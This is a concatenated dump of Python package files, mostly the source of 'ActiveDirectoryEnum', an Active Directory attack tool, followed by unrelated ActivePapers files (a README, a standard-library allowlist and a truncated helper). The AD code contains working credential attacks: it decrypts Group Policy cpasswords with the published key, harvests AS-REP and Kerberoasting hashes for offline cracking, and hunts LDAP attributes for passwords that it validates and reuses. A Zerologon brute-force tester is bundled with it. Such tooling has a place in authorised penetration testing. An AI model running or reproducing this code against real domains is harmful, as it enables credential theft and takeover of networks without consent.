we'll dump the lowest registered OS and the respective hosts for easier
enumeration afterwards
'''
def checkOS(self):
os_json = {
# Should perhaps include older version
"Windows XP": [],
"Windows Server 2008": [],
"Windows 7": [],
"Windows Server 2012": [],
"Windows 10": [],
"Windows Server 2016": [],
"Windows Server 2019": []
}
idx = 0
for _ in self.computers:
computer = json.loads(self.computers[idx].entry_to_json())
idx += 1
for os_version in os_json.keys():
try:
if os_version in computer['attributes'].get('operatingSystem'):
os_json[os_version].append(computer['attributes']['dNSHostName'])
except TypeError:
# computer['attributes'].get('operatingSystem') is of NoneType, just continue
continue
for key, value in os_json.items():
if len(value) == 0:
continue
with open('{0}-oldest-OS'.format(self.server), 'w') as f:
for item in value:
f.write('{0}: {1}\n'.format(key, item))
break
print('[ ' + colored('OK', 'green') + ' ] Wrote hosts with oldest OS to {0}-oldest-OS'.format(self.server))
def checkSYSVOL(self):
print('[ .. ] Searching SYSVOL for cpasswords\r')
cpasswords = {}
try:
smbconn = smbconnection.SMBConnection('\\\\{0}\\'.format(self.server), self.server, timeout=5)
smbconn.login(self.domuser, self.passwd)
dirs = smbconn.listShares()
for share in dirs:
if str(share['shi1_netname']).rstrip('\0').lower() == 'sysvol':
path = smbconn.listPath(str(share['shi1_netname']).rstrip('\0'), '*')
paths = [e.get_shortname() for e in path if len(e.get_shortname()) > 2]
for dirname in paths:
try:
# Dont want . or ..
subPath = smbconn.listPath(str(share['shi1_netname']).rstrip('\0'), str(dirname) + '\\*')
for sub in subPath:
if len(sub.get_shortname()) > 2:
paths.append(dirname + '\\' + sub.get_shortname())
except (SessionError, UnicodeEncodeError, NetBIOSError) as e:
continue
# Compile regexes for username and passwords
cpassRE = re.compile(r'cpassword=\"([a-zA-Z0-9/]+)\"')
unameRE = re.compile(r'userName|runAs=\"([ a-zA-Z0-9/\(\)-]+)\"')
# Prepare the ciphers based on MSDN article with key and IV
cipher = AES.new(bytes.fromhex('4e9906e8fcb66cc9faf49310620ffee8f496e806cc057990209b09a433b66c1b'), AES.MODE_CBC, bytes.fromhex('00' * 16))
# Since the first entry is the DC we dont want that
for item in paths[1:]:
if '.xml' in item.split('\\')[-1]:
with open('{0}-{1}'.format(item.split('\\')[-2], item.split('\\')[-1]), 'wb') as f:
smbconn.getFile(str(share['shi1_netname']).rstrip('\0'), item, f.write)
with open('{0}-{1}'.format(item.split('\\')[-2], item.split('\\')[-1]), 'r') as f:
try:
fileContent = f.read()
passwdMatch = cpassRE.findall(str(fileContent))
for passwd in passwdMatch:
unameMatch = unameRE.findall(str(fileContent))
for usr in unameMatch:
padding = '=' * (4 - len(passwd) % 4)
# For some reason, trailing nul bytes were on each character, so we remove any if they are there
cpasswords[usr] = cipher.decrypt(base64.b64decode(bytes(passwd + padding, 'utf-8'))).strip().decode('utf-8').replace('\x00', '')
except (UnicodeDecodeError, AttributeError) as e:
# Remove the files we had to write during the search
os.unlink('{0}-{1}'.format(item.split('\\')[-2], item.split('\\')[-1]))
continue
# Remove the files we had to write during the search
os.unlink('{0}-{1}'.format(item.split('\\')[-2], item.split('\\')[-1]))
if len(cpasswords.keys()) > 0:
with open('{0}-cpasswords.json'.format(self.server), 'w') as f:
json.dump(cpasswords, f)
if len(cpasswords.keys()) == 1:
print('\033[1A\r[ ' + colored('OK', 'green') +' ] Found {0} cpassword in a GPO on SYSVOL share'.format(len(cpasswords.keys())))
else:
print('\033[1A\r[ ' + colored('OK', 'green') +' ] Found {0} cpasswords in GPOs on SYSVOL share'.format(len(cpasswords.keys())))
except (SessionError, UnicodeEncodeError, NetBIOSError):
print('[ ' + colored('ERROR', 'red') + ' ] Some error occoured while searching SYSVOL')
else:
smbconn.close()
def splitJsonArr(self, arr):
if isinstance(arr, list):
if len(arr) == 1:
return arr[0]
return arr
def outputToBloodhoundJson(self):
print('[ ' + colored('OK', 'green') +' ] Generating BloodHound output - this may take time...')
try:
with self.suppressOutput():
opts = argparse.Namespace(dns_tcp=False, global_catalog=self.server)
auth = ADAuthentication(username=self.domuser, password=self.passwd, domain=self.server)
try:
ad = AD(auth=auth, domain=self.server, nameserver=None, dns_tcp=False)
ad.dns_resolve(kerberos=False, domain=self.server, options=opts)
except (NXDOMAIN) as e:
# So we didnt succeed with DNS lookup. Most likely an internal, so lets try to point to the DC
print('[ ' + colored('WARN', 'yellow') +' ] DNS lookup of Domain Controller failed - attempting to set the DC as Nameserver')
try:
ns = socket.gethostbyname(self.server)
opts = argparse.Namespace(dns_tcp=False, global_catalog=self.server, nameserver=ns)
ad = AD(auth=auth, domain=self.server, nameserver=ns, dns_tcp=False)
ad.dns_resolve(kerberos=False, domain=self.server, options=opts)
except (NXDOMAIN) as e:
# I'm all out of luck
print('[ ' + colored('ERROR', 'red') +' ] DNS lookup of Domain Controller failed with DC as nameserver')
exit(1)
with self.suppressOutput():
bloodhound = BloodHound(ad)
bloodhound.connect()
collection = resolve_collection_methods('Session,Trusts,ACL,DCOM,RDP,PSRemote')
bloodhound.run(collect=collection, num_workers=40, disable_pooling=False)
print('[ ' + colored('OK', 'green') +' ] BloodHound output generated')
except Exception as e:
print('[ ' + colored('ERROR', 'red') + f' ] Generating BloodHound output failed: {e}')
def sortComputers(self):
for computer in self.computers:
try:
self.smbShareCandidates.append(computer['dNSHostName'])
except LDAPKeyError:
# No dnsname registered
continue
if len(self.smbShareCandidates) == 1:
print('[ ' + colored('OK', 'green') +' ] Found {0} dnsname'.format(len(self.smbShareCandidates)))
else:
print('[ ' + colored('OK', 'green') +' ] Found {0} dnsnames'.format(len(self.smbShareCandidates)))
def enumSMB(self):
progBar = ProgressBar(widgets=['SMBConnection test: ', Percentage(), Bar(), ETA()], maxval=len(self.smbShareCandidates)).start()
prog = 0
try:
for dnsname in self.smbShareCandidates:
try:
# Changing default timeout as shares should respond withing 5 seconds if there is a share
# and ACLs make it available to self.user with self.passwd
smbconn = smbconnection.SMBConnection('\\\\' + str(dnsname), str(dnsname), timeout=5)
smbconn.login(self.domuser, self.passwd)
dirs = smbconn.listShares()
self.smbBrowseable[str(dnsname)] = {}
for share in dirs:
self.smbBrowseable[str(dnsname)][str(share['shi1_netname']).rstrip('\0')] = ''
try:
_ = smbconn.listPath(str(share['shi1_netname']).rstrip('\0'), '*')
self.smbBrowseable[str(dnsname)][str(share['shi1_netname']).rstrip('\0')] = True
except (SessionError, UnicodeEncodeError, NetBIOSError):
# Didnt have permission, all good
# Im second guessing the below adding to the JSON file as we're only interested in the listable directories really
#self.smbBrowseable[str(dnsname)][str(share['shi1_netname']).rstrip('\0')] = False
continue
smbconn.logoff()
progBar.update(prog + 1)
prog += 1
except (socket.error, NetBIOSTimeout, SessionError, NetBIOSError):
# TODO: Examine why we sometimes get:
# impacket.smbconnection.SessionError: SMB SessionError: STATUS_PIPE_NOT_AVAILABLE
# on healthy shares. It seems to be reported with CIF shares
progBar.update(prog + 1)
prog += 1
continue
except ValueError:
# We reached end of progressbar, continue since we finish below
pass
progBar.finish()
print('')
availDirs = []
for key, value in self.smbBrowseable.items():
for _, v in value.items():
if v:
availDirs.append(key)
if len(self.smbShareCandidates) == 1:
print('[ ' + colored('OK', 'green') + ' ] Searched {0} share and {1} with {2} subdirectories/files is browseable by {3}'.format(len(self.smbShareCandidates), len(self.smbBrowseable.keys()), len(availDirs), self.domuser))
else:
print('[ ' + colored('OK', 'green') + ' ] Searched {0} shares and {1} with {2} subdirectories/file sare browseable by {3}'.format(len(self.smbShareCandidates), len(self.smbBrowseable.keys()), len(availDirs), self.domuser))
if len(self.smbBrowseable.keys()) > 0:
with open('{0}-open-smb.json'.format(self.server), 'w') as f:
json.dump(self.smbBrowseable, f, indent=4, sort_keys=False)
print('[ ' + colored('OK', 'green') + ' ] Wrote browseable shares to {0}-open-smb.json'.format(self.server))
def write_file(self):
with open(str(self.output) + '-computers', 'w') as f:
for item in self.computers:
f.write(str(item))
f.write("\n")
with open(str(self.output) + '-people', 'w') as f:
for item in self.people:
f.write(str(item))
f.write("\n")
with open(str(self.output) + '-groups', 'w') as f:
for item in self.groups:
f.write(str(item))
f.write("\n")
with open(str(self.output) + '-spn', 'w') as f:
for item in self.spn:
f.write(str(item))
f.write("\n")
with open(str(self.output) + '-acl', 'w') as f:
for item in self.acl:
f.write(str(item))
f.write("\n")
with open(str(self.output) + '-gpo', 'w') as f:
for item in self.gpo:
f.write(str(item))
f.write("\n")
with open(str(self.output) + '-domains', 'w') as f:
for item in self.domains:
f.write(str(item))
f.write("\n")
with open(str(self.output) + '-ous', 'w') as f:
for item in self.ous:
f.write(str(item))
f.write("\n")
print('[ ' + colored('OK', 'green') +' ] Wrote all files to {0}-obj_name'.format(self.output))
def enumKerbPre(self):
# Build user array
users = []
self.conn.search(self.dc_string[:-1], '(&(samaccounttype=805306368)(userAccountControl:1.2.840.113556.1.4.803:=4194304))', attributes=self.ldapProps, search_scope=SUBTREE)
for entry in self.conn.entries:
users.append(str(entry['sAMAccountName']) + '@{0}'.format(self.server))
if len(users) == 0:
print('[ ' + colored('OK', 'green') +' ] Found {0} accounts that does not require Kerberos preauthentication'.format(len(users)))
elif len(users) == 1:
print('[ ' + colored('OK', 'yellow') +' ] Found {0} account that does not require Kerberos preauthentication'.format(len(users)))
else:
print('[ ' + colored('OK', 'yellow') +' ] Found {0} accounts that does not require Kerberos preauthentication'.format(len(users)))
hashes = []
# Build request for Tickets
for usr in users:
clientName = Principal(usr, type=constants.PrincipalNameType.NT_PRINCIPAL.value)
asReq = AS_REQ()
domain = str(self.server).upper()
serverName = Principal('krbtgt/{0}'.format(domain), type=constants.PrincipalNameType.NT_PRINCIPAL.value)
pacReq = KERB_PA_PAC_REQUEST()
pacReq['include-pac'] = True
encodedPacReq = encoder.encode(pacReq)
asReq['pvno'] = 5
asReq['msg-type'] = int(constants.ApplicationTagNumbers.AS_REQ.value)
asReq['padata'] = noValue
asReq['padata'][0] = noValue
asReq['padata'][0]['padata-type'] = int(constants.PreAuthenticationDataTypes.PA_PAC_REQUEST.value)
asReq['padata'][0]['padata-value'] = encodedPacReq
requestBody = seq_set(asReq, 'req-body')
options = list()
options.append(constants.KDCOptions.forwardable.value)
options.append(constants.KDCOptions.renewable.value)
options.append(constants.KDCOptions.proxiable.value)
requestBody['kdc-options'] = constants.encodeFlags(options)
seq_set(requestBody, 'sname', serverName.components_to_asn1)
seq_set(requestBody, 'cname', clientName.components_to_asn1)
requestBody['realm'] = domain
now = datetime.datetime.utcnow() + datetime.timedelta(days=1)
requestBody['till'] = KerberosTime.to_asn1(now)
requestBody['rtime'] = KerberosTime.to_asn1(now)
requestBody['nonce'] = random.getrandbits(31)
supportedCiphers = (int(constants.EncryptionTypes.rc4_hmac.value),)
seq_set_iter(requestBody, 'etype', supportedCiphers)
msg = encoder.encode(asReq)
try:
response = sendReceive(msg, domain, self.server)
except KerberosError as e:
if e.getErrorCode() == constants.ErrorCodes.KDC_ERR_ETYPE_NOSUPP.value:
supportedCiphers = (int(constants.EncryptionTypes.aes256_cts_hmac_sha1_96.value), int(constants.EncryptionTypes.aes128_cts_hmac_sha1_96.value),)
seq_set_iter(requestBody, 'etype', supportedCiphers)
msg = encoder.encode(asReq)
response = sendReceive(msg, domain, self.server)
else:
print(e)
continue
asRep = decoder.decode(response, asn1Spec=AS_REP())[0]
hashes.append('$krb5asrep${0}@{1}:{2}${3}'.format(usr, domain, hexlify(asRep['enc-part']['cipher'].asOctets()[:16]).decode(), hexlify(asRep['enc-part']['cipher'].asOctets()[16:]).decode()))
if len(hashes) > 0:
with open('{0}-jtr-hashes'.format(self.server), 'w') as f:
for h in hashes:
f.write(str(h) + '\n')
print('[ ' + colored('OK', 'yellow') +' ] Wrote all hashes to {0}-jtr-hashes'.format(self.server))
else:
print('[ ' + colored('OK', 'green') +' ] Got 0 hashes')
def enumSPNUsers(self):
users_spn = {
}
user_tickets = {
}
userDomain = self.domuser.split('@')[1]
idx = 0
for entry in self.spn:
spns = json.loads(self.spn[idx].entry_to_json())
users_spn[self.splitJsonArr(spns['attributes'].get('name'))] = self.splitJsonArr(spns['attributes'].get('servicePrincipalName'))
idx += 1
# Get TGT for the supplied user
client = Principal(self.domuser, type=constants.PrincipalNameType.NT_PRINCIPAL.value)
try:
# We need to take the domain from the user@domain since it *could* be a cross-domain user
tgt, cipher, _, newSession = getKerberosTGT(client, '', userDomain, compute_lmhash(self.passwd), compute_nthash(self.passwd), None, kdcHost=None)
TGT = {}
TGT['KDC_REP'] = tgt
TGT['cipher'] = cipher
TGT['sessionKey'] = newSession
for user, spn in users_spn.items():
if isinstance(spn, list):
# We only really need one to get a ticket
spn = spn[0]
else:
try:
# Get the TGS
serverName = Principal(spn, type=constants.PrincipalNameType.NT_SRV_INST.value)
tgs, cipher, _, newSession = getKerberosTGS(serverName, userDomain, None, TGT['KDC_REP'], TGT['cipher'], TGT['sessionKey'])
# Decode the TGS
decoded = decoder.decode(tgs, asn1Spec=TGS_REP())[0]
# Get different encryption types
if decoded['ticket']['enc-part']['etype'] == constants.EncryptionTypes.rc4_hmac.value:
entry = '$krb5tgs${0}$*{1}${2}${3}*${4}${5}'.format(constants.EncryptionTypes.rc4_hmac.value, user, decoded['ticket']['realm'], spn.replace(':', '~'), hexlify(decoded['ticket']['enc-part']['cipher'][:16].asOctets()).decode(), hexlify(decoded['ticket']['enc-part']['cipher'][16:].asOctets()).decode())
user_tickets[spn] = entry
elif decoded['ticket']['enc-part']['etype'] == constants.EncryptionTypes.aes128_cts_hmac_sha1_96.value:
entry = '$krb5tgs${0}${1}${2}$*{3}*${4}${5}'.format(constants.EncryptionTypes.aes128_cts_hmac_sha1_96.value, user, decoded['ticket']['realm'], spn.replace(':', '~'), hexlify(decoded['ticket']['enc-part']['cipher'][-12:].asOctets()).decode(), hexlify(decoded['ticket']['enc-part']['cipher'][:-12].asOctets()).decode())
user_tickets[spn] = entry
elif decoded['ticket']['enc-part']['etype'] == constants.EncryptionTypes.aes256_cts_hmac_sha1_96.value:
entry = '$krb5tgs${0}${1}${2}$*{3}*${4}${5}'.format(constants.EncryptionTypes.aes256_cts_hmac_sha1_96.value, user, decoded['ticket']['realm'], spn.replace(':', '~'), hexlify(decoded['ticket']['enc-part']['cipher'][-12:].asOctets()).decode(), hexlify(decoded['ticket']['enc-part']['cipher'][:-12].asOctets()).decode())
user_tickets[spn] = entry
elif decoded['ticket']['enc-part']['etype'] == constants.EncryptionTypes.des_cbc_md5.value:
entry = '$krb5tgs${0}$*{1}${2}${3}*${4}${5}'.format(constants.EncryptionTypes.des_cbc_md5.value, user, decoded['ticket']['realm'], spn.replace(':', '~'), hexlify(decoded['ticket']['enc-part']['cipher'][:16].asOctets()).decode(), hexlify(decoded['ticket']['enc-part']['cipher'][16:].asOctets()).decode())
user_tickets[spn] = entry
except KerberosError:
# For now continue
# TODO: Maybe look deeper into issue here
continue
if len(user_tickets.keys()) > 0:
with open('{0}-spn-tickets'.format(self.server), 'w') as f:
for key, value in user_tickets.items():
f.write('{0}:{1}\n'.format(key, value))
if len(user_tickets.keys()) == 1:
print('[ ' + colored('OK', 'yellow') +' ] Got and wrote {0} ticket for Kerberoasting. Run: john --format=krb5tgs --wordlist=<list> {1}-spn-tickets'.format(len(user_tickets.keys()), self.server))
else:
print('[ ' + colored('OK', 'yellow') +' ] Got and wrote {0} tickets for Kerberoasting. Run: john --format=krb5tgs --wordlist=<list> {1}-spn-tickets'.format(len(user_tickets.keys()), self.server))
else:
print('[ ' + colored('OK', 'green') +' ] Got {0} tickets for Kerberoasting'.format(len(user_tickets.keys())))
except KerberosError as err:
print('[ ' + colored('ERROR', 'red') +' ] Kerberoasting failed with error: {0}'.format(err.getErrorString()[1]))
def enumForCreds(self, ldapdump):
searchTerms = [
'legacy', 'pass', 'password', 'pwd', 'passcode'
]
excludeTerms = [
'badPasswordTime', 'badPwdCount', 'pwdLastSet', 'legacyExchangeDN'
]
possiblePass = {}
idx = 0
for _ in ldapdump:
user = json.loads(ldapdump[idx].entry_to_json())
for prop, value in user['attributes'].items():
if any(term in prop.lower() for term in searchTerms) and not any(ex in prop for ex in excludeTerms):
try:
possiblePass[user['attributes']['userPrincipalName'][0]] = value[0]
except KeyError:
# Could be a service user instead
try:
possiblePass[user['attributes']['servicePrincipalName'][0]] = value[0]
except KeyError:
# Don't know which type
continue
idx += 1
if len(possiblePass) > 0:
print('[ ' + colored('INFO', 'green') +' ] Found possible password in properties')
print('[ ' + colored('INFO', 'green') +' ] Attempting to determine if it is a password')
for user, password in possiblePass.items():
try:
usr, passwd = self.entroPass(user, password)
except TypeError:
# None returned, just continue
continue
if not self.CREDS:
self.domuser = usr
self.passwd = passwd
self.runWithCreds()
return
def entroPass(self, user, password):
if not password:
return None
# First check if it is a clear text
dc_test_conn = Server(self.server, get_info=ALL)
test_conn = Connection(dc_test_conn, user=user, password=password)
test_conn.bind()
# Validate the login (bind) request
if int(test_conn.result['result']) != 0:
if self.CREDS:
print('[ ' + colored('INFO', 'yellow') +' ] User: "{0}" with: "{1}" as possible clear text password'.format(user, password))
else:
print('[ ' + colored('INFO', 'green') +' ] User: "{0}" with: "{1}" was not cleartext'.format(user, password))
else:
if self.CREDS:
print('[ ' + colored('INFO', 'yellow') +' ] User: "{0}" had cleartext password of: "{1}" in a property'.format(user, password))
else:
print('[ ' + colored('OK', 'yellow') +' ] User: "{0}" had cleartext password of: "{1}" in a property - continuing with these creds'.format(user, password))
print('')
return user, password
test_conn.unbind()
# Attempt for base64
# Could be base64, lets try
try:
pw = base64.b64decode(bytes(password, encoding='utf-8')).decode('utf-8')
except base64.binascii.Error:
return None
# Attempt decoded PW
dc_test_conn = Server(self.server, get_info=ALL)
test_conn = Connection(dc_test_conn, user=user, password=pw)
test_conn.bind()
# Validate the login (bind) request
if int(test_conn.result['result']) != 0:
if self.CREDS:
print('[ ' + colored('INFO', 'yellow') +' ] User: "{0}" with: "{1}" as possible base64 decoded password'.format(user, pw))
else:
print('[ ' + colored('INFO', 'green') +' ] User: "{0}" with: "{1}" was not base64 encoded'.format(user, pw))
else:
if self.CREDS:
print('[ ' + colored('INFO', 'yellow') +' ] User: "{0}" had base64 encoded password of: "{1}" in a property'.format(user, pw))
else:
print('[ ' + colored('OK', 'yellow') +' ] User: "{0}" had base64 encoded password of: "{1}" in a property - continuing with these creds'.format(user, pw))
print('')
return user, pw
def main(args):
parser = argparse.ArgumentParser(prog='ade', formatter_class=argparse.RawDescriptionHelpFormatter, description=textwrap.dedent('''
___ __ _ ____ _ __ ______
/ | _____/ /_(_) _____ / __ \(_)_______ _____/ /_____ _______ __/ ____/___ __ ______ ___
/ /| |/ ___/ __/ / | / / _ \/ / / / / ___/ _ \/ ___/ __/ __ \/ ___/ / / / __/ / __ \/ / / / __ `__ \\
/ ___ / /__/ /_/ /| |/ / __/ /_/ / / / / __/ /__/ /_/ /_/ / / / /_/ / /___/ / / / /_/ / / / / / /
/_/ |_\___/\__/_/ |___/\___/_____/_/_/ \___/\___/\__/\____/_/ \__, /_____/_/ /_/\__,_/_/ /_/ /_/
/____/
/*----------------------------------------------------------------------------------------------------------*/
'''))
parser.add_argument('--dc', type=str, help='Hostname of the Domain Controller')
parser.add_argument('-o', '--out-file', type=str, help='Path to output file. If no path, CWD is assumed (default: None)')
parser.add_argument('-u', '--user', type=str, help='Username of the domain user to query with. The username has to be domain name as `[email protected]`')
parser.add_argument('-s', '--secure', help='Try to estalish connection through LDAPS', action='store_true')
parser.add_argument('-smb', '--smb', help='Force enumeration of SMB shares on all computer objects fetched', action='store_true')
parser.add_argument('-kp', '--kerberos_preauth', help='Attempt to gather users that does not require Kerberos preauthentication', action='store_true')
parser.add_argument('-bh', '--bloodhound', help='Output data in the format expected by BloodHound', action='store_true')
parser.add_argument('-spn', help='Attempt to get all SPNs and perform Kerberoasting', action='store_true')
parser.add_argument('-sysvol', help='Search sysvol for GPOs with cpassword and decrypt it', action='store_true')
parser.add_argument('--all', help='Run all checks', action='store_true')
parser.add_argument('--no-creds', help='Start without credentials', action='store_true')
parser.add_argument('--dry-run', help='Don\'t execute a test but run as if. Used for testing params etc.', action='store_true')
parser.add_argument('--exploit', type=str, help='Show path to PoC exploit code')
exploits = {
"cve-2020-1472": "https://github.com/dirkjanm/CVE-2020-1472",
}
if len(args) == 1:
parser.print_help(sys.stderr)
sys.exit(0)
args = parser.parse_args()
if args.exploit:
if args.exploit.lower() in exploits.keys():
print('Exploit for: ' + colored(args.exploit.lower(), 'green') + f' can be found at: {exploits[args.exploit.lower()]}')
sys.exit(0)
else:
print(f'{args.exploit.lower()} not in imbedded exploits')
sys.exit(0)
if not args.dc:
print("--dc argument is required")
sys.exit(0)
# If theres more than 4 sub'ed (test.test.domain.local) - tough luck sunny boy
domainRE = re.compile(r'^((?:[a-zA-Z0-9-.]+)?(?:[a-zA-Z0-9-.]+)?[a-zA-Z0-9-]+\.[a-zA-Z]+)$')
userRE = re.compile(r'^([a-zA-Z0-9-\.]+@(?:[a-zA-Z0-9-.]+)?(?:[a-zA-Z0-9-.]+)?[a-zA-Z0-9-]+\.[a-zA-Z0-9-]+)$')
domainMatch = domainRE.findall(args.dc)
if not domainMatch:
print('[ ' + colored('ERROR', 'red') +' ] Domain flag has to be in the form "domain.local"')
sys.exit(1)
if args.all:
args.smb = True
args.kerberos_preauth = True
args.bloodhound = True
args.spn = True
if args.no_creds:
args.user = False
else:
userMatch = userRE.findall(args.user)
if not userMatch:
print('[ ' + colored('ERROR', 'red') +' ] User flag has to be in the form "[email protected]"')
sys.exit(1)
# Boolean flow control flags
file_to_write = None
if args.out_file:
file_to_write = args.out_file
enumAD = EnumAD(args.dc, args.secure, file_to_write, args.smb, args.bloodhound, args.kerberos_preauth, args.spn, args.sysvol, args.dry_run, args.user)
# Just print a blank line for output sake
print('') | ActiveDirectoryEnum | /ActiveDirectoryEnum-0.5.0.tar.gz/ActiveDirectoryEnum-0.5.0/ade/__init__.py | __init__.py |
from impacket.dcerpc.v5 import nrpc, epm
from impacket.dcerpc.v5.dtypes import NULL
from impacket.dcerpc.v5 import transport
from impacket import crypto
import hmac, hashlib, struct, sys, socket, time
from binascii import hexlify, unhexlify
from subprocess import check_call
# Give up brute-forcing after this many attempts. If vulnerable, 256 attempts are expected to be neccessary on average.
MAX_ATTEMPTS = 2000 # False negative chance: 0.04%
def fail(msg):
print(msg, file=sys.stderr)
print('This might have been caused by invalid arguments or network issues.', file=sys.stderr)
sys.exit(2)
def try_zero_authenticate(dc_handle, dc_ip, target_computer):
# Connect to the DC's Netlogon service.
binding = epm.hept_map(dc_ip, nrpc.MSRPC_UUID_NRPC, protocol='ncacn_ip_tcp')
rpc_con = transport.DCERPCTransportFactory(binding).get_dce_rpc()
rpc_con.connect()
rpc_con.bind(nrpc.MSRPC_UUID_NRPC)
# Use an all-zero challenge and credential.
plaintext = b'\x00' * 8
ciphertext = b'\x00' * 8
# Standard flags observed from a Windows 10 client (including AES), with only the sign/seal flag disabled.
flags = 0x212fffff
# Send challenge and authentication request.
nrpc.hNetrServerReqChallenge(rpc_con, dc_handle + '\x00', target_computer + '\x00', plaintext)
try:
server_auth = nrpc.hNetrServerAuthenticate3(
rpc_con, dc_handle + '\x00', target_computer + '$\x00', nrpc.NETLOGON_SECURE_CHANNEL_TYPE.ServerSecureChannel,
target_computer + '\x00', ciphertext, flags
)
# It worked!
assert server_auth['ErrorCode'] == 0
return rpc_con
except nrpc.DCERPCSessionError as ex:
# Failure should be due to a STATUS_ACCESS_DENIED error. Otherwise, the attack is probably not working.
if ex.get_error_code() == 0xc0000022:
return None
else:
fail(f'Unexpected error code from DC: {ex.get_error_code()}.')
except BaseException as ex:
fail(f'Unexpected error: {ex}.')
def perform_attack(dc_handle, dc_ip, target_computer):
# Keep authenticating until succesfull. Expected average number of attempts needed: 256.
print('Performing authentication attempts...')
rpc_con = None
for attempt in range(0, MAX_ATTEMPTS):
rpc_con = try_zero_authenticate(dc_handle, dc_ip, target_computer)
if rpc_con == None:
print('=', end='', flush=True)
else:
break
if rpc_con:
print('\nSuccess! DC can be fully compromised by a Zerologon attack.')
else:
print('\nAttack failed. Target is probably patched.')
sys.exit(1)
if __name__ == '__main__':
if not (3 <= len(sys.argv) <= 4):
print('Usage: zerologon_tester.py <dc-name> <dc-ip>\n')
print('Tests whether a domain controller is vulnerable to the Zerologon attack. Does not attempt to make any changes.')
print('Note: dc-name should be the (NetBIOS) computer name of the domain controller.')
sys.exit(1)
else:
[_, dc_name, dc_ip] = sys.argv
dc_name = dc_name.rstrip('$')
perform_attack('\\\\' + dc_name, dc_ip, dc_name) | ActiveDirectoryEnum | /ActiveDirectoryEnum-0.5.0.tar.gz/ActiveDirectoryEnum-0.5.0/ade/cve_2020_1472/__init__.py | __init__.py |
ActivePapers is a tool for working with executable papers, which
combine data, code, and documentation in single-file packages,
suitable for publication as supplementary material or on sites such as
[figshare](http://figshare.com).
The ActivePapers Python edition requires Python 2.7 or Python 3.3 to 3.5.
It also relies on the following libraries:
- NumPy 1.6 or later (http://numpy.scipy.org/)
- HDF5 1.8.7 or later (http://www.hdfgroup.org/HDF5/)
- h5py 2.2 or later (http://www.h5py.org/)
- tempdir 0.6 or later (http://pypi.python.org/pypi/tempdir/)
Installation of ActivePapers.Py:
python setup.py install
This installs the ActivePapers Python library and the command-line
tool "aptool" for managing ActivePapers.
For documentation, see the
[ActivePapers Web site](http://www.activepapers.org/python-edition/).
ActivePapers development takes place
[on Github](http://github.com/activepapers/activepapers-python).
Runnning the tests also requires the [tempdir](https://pypi.python.org/pypi/tempdir/) library and either the
[nose](http://pypi.python.org/pypi/nose/) or the [pytest](http://pytest.org) testing framework. The recommended way to run the tests is
```
cd tests
./run_all_tests.sh nosetests
```
or
```
cd tests
./run_all_tests.sh py.test
```
This launches the test runner on each test script individually. The simpler approach of simply running `nosetests` or `py.test` in directory `tests` leads to a few test failures because the testing framework's import handling conflicts with the implementation of internal modules in ActivePapers.
| ActivePapers.Py | /ActivePapers.Py-0.2.2.tar.gz/ActivePapers.Py-0.2.2/README.md | README.md |
# The following is a complete list of modules in the standard library,
# obtained from an installation of Python 3.3. Only modules starting
# with an underscore were removed. Forbidden modules are commented out.
# The selection needs a more careful revision.
allowed_modules = [
"abc",
"aifc",
#"antigravity",
#"argparse",
"ast",
#"asynchat",
#"asyncore",
"base64",
"bdb",
"binhex",
"bisect",
"bz2",
#"cProfile",
"calendar",
#"cgi",
#"cgitb",
"chunk",
"cmd",
"code",
"codecs",
"codeop",
"collections",
"colorsys",
"compileall",
#"concurrent",
"configparser",
"contextlib",
"copy",
"copyreg",
"crypt",
"csv",
#"ctypes",
#"curses",
"datetime",
#"dbm",
"decimal",
"difflib",
#"dis",
#"distutils",
#"doctest",
#"dummy_threading",
#"email",
"encodings",
"filecmp",
"fileinput",
"fnmatch",
"formatter",
"fractions",
#"ftplib",
"functools",
#"genericpath",
#"getopt",
#"getpass",
"gettext",
#"glob",
"gzip",
"hashlib",
"heapq",
"hmac",
"html",
#"http",
#"idlelib",
#"imaplib",
"imghdr",
#"imp",
#"importlib",
"inspect",
#"io",
#"ipaddress",
"json",
"keyword",
"lib2to3",
"linecache",
"locale",
"logging",
"lzma",
#"macpath",
#"macurl2path",
#"mailbox",
#"mailcap",
"mimetypes",
#"modulefinder",
#"multiprocessing",
#"netrc",
#"nntplib",
#"ntpath",
#"nturl2path",
"numbers",
"opcode",
#"optparse",
"os",
"os2emxpath",
#"pdb",
"pickle",
"pickletools",
"pipes",
#"pkgutil",
"plistlib",
"poplib",
"posixpath",
"pprint",
"profile",
"pstats",
"pty",
"py_compile",
"pyclbr",
"pydoc",
"pydoc_data",
"queue",
"quopri",
"random",
"re",
"reprlib",
"rlcompleter",
"runpy",
"sched",
"shelve",
"shlex",
"shutil",
#"site",
#"smtpd",
#"smtplib",
#"sndhdr",
#"socket",
#"socketserver",
#"sqlite3",
"sre_compile",
"sre_constants",
"sre_parse",
#"ssl",
#"stat",
"string",
"stringprep",
"struct",
#"subprocess",
#"sunau",
"symbol",
"symtable",
"sysconfig",
"tabnanny",
"tarfile",
#"telnetlib",
#"tempfile",
"test",
"textwrap",
#"this",
#"threading",
"timeit",
#"tkinter",
"token",
"tokenize",
"trace",
#"traceback",
"tty",
"turtle",
"turtledemo",
"types",
#"unittest",
#"urllib",
"uu",
#"uuid",
"venv",
"warnings",
#"wave",
"weakref",
#"webbrowser",
#"wsgiref",
"xdrlib",
"xml",
"xmlrpc",
"zipfile",
## extension modules
"array",
"atexit",
#"audioop",
"binascii",
"bz2",
"cmath",
"crypt",
#"fcntl",
#"grp",
"math",
#"mmap",
#"nis",
"parser",
"pyexpat",
#"readline",
#"resource",
#"select",
#"syslog",
#"termios",
"time",
"unicodedata",
"zlib",
] | ActivePapers.Py | /ActivePapers.Py-0.2.2.tar.gz/ActivePapers.Py-0.2.2/lib/activepapers/standardlib3.py | standardlib3.py |
import json
import os
from activepapers import url
#
# The ACTIVEPAPERS_LIBRARY environment variable follows the
# same conventions as PATH under Unix.
#
library = os.environ.get('ACTIVEPAPERS_LIBRARY', None)
if library is None:
# This is Unix-only, needs a Windows equivalent
home = os.environ.get('HOME', None)
if home is None:
library = ""
else:
library = os.path.join(home, '.activepapers')
if not os.path.exists(library):
try:
os.mkdir(library)
except (IOError, OSError):
library = ""
if not os.path.exists(library):
library = ""
library = library.split(':')
def split_paper_ref(paper_ref):
index = paper_ref.find(':')
if index == -1:
raise ValueError("invalid paper reference %s" % paper_ref)
return paper_ref[:index].lower(), paper_ref[index+1:]
#
# Return the local filename for a paper reference,
# after downloading the file if required.
#
def _get_local_file(label):
filename = label + '.ap'
for dir in library:
full_name = os.path.join(dir, "local", filename)
if os.path.exists(full_name):
return full_name
